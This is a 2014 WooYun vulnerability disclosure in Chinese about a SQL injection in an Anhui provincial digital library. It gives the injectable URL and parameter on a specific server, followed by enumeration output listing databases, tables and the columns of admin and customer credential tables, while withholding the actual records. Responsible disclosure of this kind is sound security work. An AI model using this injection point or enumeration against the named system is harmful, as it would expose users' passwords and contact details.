当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084692

漏洞标题:某省数字图书馆SQL注入泄漏敏感信息

相关厂商:中国科学技术大学

漏洞作者: an0nym0u5

提交时间:2014-11-26 10:15

修复时间:2014-12-01 10:16

公开时间:2014-12-01 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-26: 细节已通知厂商并且等待厂商处理中
2014-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入

详细说明:

安徽省高等学校数字图书馆http://ahadl.org/

ah.png


注入点:http://202.38.93.29//asearch.do?status=showpage&LanguageType=0
注入参数:LanguageType

ah2.png


漏洞证明:

ah3.jpg


available databases [7]:
[*] ahzx1222
[*] master
[*] model
[*] msdb
[*] proone
[*] proonetest
[*] tempdb


测试第一个库:

Database: ahzx1222
[52 tables]
+-------------------------+
| dbo.ACCOUNT             |
| dbo.ACTIONDEF           |
| dbo.AFFICHE             |
| dbo.AutoSystem          |
| dbo.CCIPFILTER          |
| dbo.CLASSFIY            |
| dbo.CLASSSETTING        |
| dbo.ClearCacheLog       |
| dbo.Customer            |
| dbo.CustomerServers     |
| dbo.D99_CMD             |
| dbo.DOCCLASSIFY         |
| dbo.DeleteFileOrderRule |
| dbo.DeleteFileSelRule   |
| dbo.EBOOKSERVERIP       |
| dbo.FeedBackTb          |
| dbo.GOLBALSETTING       |
| dbo.IPAREA              |
| dbo.IPFILTER            |
| dbo.ISORES              |
| dbo.ISOType             |
| dbo.LOGMAKESRC          |
| dbo.LOGSEARCH           |
| dbo.LOGVIEWSRC          |
| dbo.MMSSERVER           |
| dbo.NewInfo             |
| dbo.OAIFormat           |
| dbo.ONLINEIP            |
| dbo.ONLINEUSER          |
| dbo.Question            |
| dbo.REQUESTISO          |
| dbo.RESOURCELIST        |
| dbo.RESOURCETYPE        |
| dbo.RESSERVER           |
| dbo.SEARCHFIELDS        |
| dbo.SEARCHINDEX         |
| dbo.SetMetaCDServer     |
| dbo.ShareServerList     |
| dbo.SynchrRes           |
| dbo.SynchroLog          |
| dbo.SystemSetType       |
| dbo.TEMPLATE            |
| dbo.TEMPLATEFIELDS      |
| dbo.TIMERREAP           |
| dbo.VodCommend          |
| dbo.WEBTEMPLATE         |
| dbo.books               |
| dbo.dcfilelds           |
| dbo.dtproperties        |
| dbo.other               |
| dbo.sqlmapoutput        |
| dbo.sysdiagrams         |
+-------------------------+


dbo.ACCOUNT很明显是管理员表:

Database: ahzx1222
Table: dbo.ACCOUNT
[15 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| ACCID         | numeric  |
| ACCNAME       | char     |
| ADDDATE       | datetime |
| EMAIL         | char     |
| isTryUser     | bit      |
| LASTLOGINDATE | datetime |
| LimitTime     | datetime |
| PASSWORD      | char     |
| QQ            | char     |
| ResLevel      | numeric  |
| SEX           | numeric  |
| TELEPHONE     | char     |
| UserDesc      | varchar  |
| USERLASTIP    | char     |
| USERTYPE      | numeric  |
+---------------+----------+


有用户账户密码、联系方式等等,点到为止不列举。
还有一个表是dbo.Customer,这是普通用户表:

Database: ahzx1222
Table: dbo.Customer
[15 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| AddTime          | datetime |
| AutoSysID        | int      |
| CustomerID       | int      |
| CustomerName     | varchar  |
| CustomerPassword | varchar  |
| ISEnable         | int      |
| LimitTime        | varchar  |
| RelationEmail    | varchar  |
| RelationName     | varchar  |
| RelationTel      | varchar  |
| SchoolCode       | varchar  |
| SchoolName       | varchar  |
| ServerIP         | varchar  |
| SIDs             | varchar  |
| WebIP            | varchar  |


看到了CustomerName、CustomerPassword、RelationTel等敏感字段,这里不列出信息。只证明漏洞存在及其危害性。其他库和表同样可以获得相应数据。

修复方案:

参数严格过滤。

版权声明:转载请注明来源 an0nym0u5@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-01 10:16

厂商回复:

最新状态:

暂无